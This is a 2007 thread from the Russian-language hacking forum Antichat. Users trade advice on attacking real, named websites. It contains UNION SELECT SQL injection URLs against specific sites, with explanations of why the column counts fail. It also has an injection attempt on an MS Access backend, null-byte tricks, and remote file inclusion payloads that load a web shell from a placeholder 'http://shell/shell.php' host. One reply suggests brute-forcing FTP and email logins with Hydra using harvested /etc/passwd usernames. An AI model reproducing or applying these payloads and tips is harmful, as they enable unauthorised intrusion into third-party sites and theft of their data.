ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
29.12.2007, 22:29
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
У меня какая-то херня получается с 1 сайтом:
Код HTML:
http://www.verticalworld.net/school/program.php?id=6'
Если сделать так:
Код HTML:
http://www.verticalworld.net/school/program.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
Не получается, а если так:
Код HTML:
http://www.verticalworld.net/school/program.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
Получается еще неправильней. Что делать?  |
|
|
29.12.2007, 22:35
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
вот все пишут, когда получил файл etc/passwd пробрути по логин:логин
А что пробрутить-то надо и чем?
Ещё вопрос, очень гглупый. для чего в БД используется limit и как он помогает в иньекциях?
Бруть с помощью Hydra фтп, е-маилы и т.д. вижео по использованию выложено здесь, поюзай поиск.
|
|
|
|
29.12.2007, 22:55
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
2~EviL~
есть 2 запроса, в которых используется id (на самом деле их 3 как минимум там еще UPDATE есть)
1.SELECT * FROM school_programs WHERE id =$id он получает все колонки из таблицы school_programs, их 37 и когда ты подставляешь union select с 37 колонками запрос получается правильный:
Код:
SELECT * FROM school_programs WHERE id =1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
но потом $id (и твой запрос соответственно) передается во второй запрос:
2.SELECT AVG(score) AS number FROM school_rating WHERE program_id =$id он получает одно число (среднее из колонки score) подставляем значение $id получаем
Код:
SELECT AVG(score) AS number FROM school_rating WHERE program_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
неправильный запрос, для правильного запроса надо было бы указать:
$id=1 union select 1/* но это вызвало бы ошибку в первом запросе, так что тут остается только использовать подзапросы по другому никак
__________________
Карфаген должен быть разрушен...
|
|
|
|
29.12.2007, 23:05
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
Спасибо, Scipio, я даже не подозревал что все так сложно... Ну, тогда есть вопрос и по MSSQL:
http://www.thetruthseeker.co.uk/article.asp?ID=1+OR+1=@@version--
Я так понял, что не хватает какого-то оператора. Можете подсказать в чем суть ошибки, и, конечно, показать как правильно составить запрос =)
|
|
|
|
29.12.2007, 23:14
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Это инъекция в MS Access в нем очень сложно провести инъекцию, в твоем случае только если подзапросы помогут (т.е. посимвольный перебор)
__________________
Карфаген должен быть разрушен...
|
|
|
|
29.12.2007, 23:18
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
Ладно, сегодня явно не мой день  Остается надеяться на завтрашний )) |
|
|
|
30.12.2007, 15:12
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 11
Провел на форуме:
54303
Репутация:
0
|
|
Вот нашел что-то
*******.ru/index.php?page=viewcom&newscode='
Код:
Warning: fopen() [function.fopen]: Unable to access news/\'.mnf in /www/inquizit/www/htdocs/include/showcom.inc on line 2 Warning: fopen(news/\'.mnf) [function.fopen]: failed to open stream: No such file or directory in /www/inquizit/www/htdocs/include/showcom.inc on line 2 Warning: fgets(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 2 Warning: fpassthru(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 5 Warning: filemtime() [function.filemtime]: stat failed for news/\'.mnf in /www/inquizit/www/htdocs/include/showcom.inc on line 5 01.01.70 03:00 Warning: fclose(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 6
Это php-include? может что-то другое или вообще уязвимости нет..?
Последний раз редактировалось HedgeH0g.trj; 30.12.2007 в 15:22..
|
|
|
|
30.12.2007, 15:14
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
скорее всего magic_q on поэтому инклуд не пройдет. хотя существует маленькая вероятность addslashes или подобного. попробуй добавить %00
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
30.12.2007, 15:24
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 11
Провел на форуме:
54303
Репутация:
0
|
|
просто после кавычки?
|
|
|
|
30.12.2007, 15:25
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
нет...
?page=viewcom&newscode=http://shell/shell%00
?page=viewcom&newscode=http://shell/shell.php%00
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид